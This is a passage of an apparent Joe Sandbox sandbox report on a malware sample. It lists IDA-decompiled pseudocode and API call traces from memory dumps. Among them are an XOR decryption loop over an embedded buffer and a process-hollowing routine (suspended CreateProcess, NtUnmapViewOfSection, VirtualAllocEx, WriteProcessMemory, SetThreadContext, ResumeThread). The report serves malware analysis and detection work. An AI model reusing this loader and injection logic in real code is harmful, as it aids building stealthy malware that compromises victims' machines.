    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}










    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}













    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}













    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}








    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}














    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 002DE0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 002DE0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 002DE1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002DE1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002DE235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 002DE271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 002DE297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 002DE306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002DE32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 002DE34E
    • ResumeThread.KERNELBASE(00000000), ref: 002DE35A
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 002DE493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 002DE4B6
      • Part of subcall function 002DE080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 002DE0C6
      • Part of subcall function 002DE080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 002DE0DC
      • Part of subcall function 002DE080: CreateProcessA.KERNEL32(?,00000000), ref: 002DE1C2
      • Part of subcall function 002DE080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 002DE1F0
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 002DE54C
      • Part of subcall function 002DE380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 002DE493
      • Part of subcall function 002DE380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 002DE4B6
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 0000000D.00000002.1521841475.002DD000.00000040.sdmp, Offset: 002DD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_2dd000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
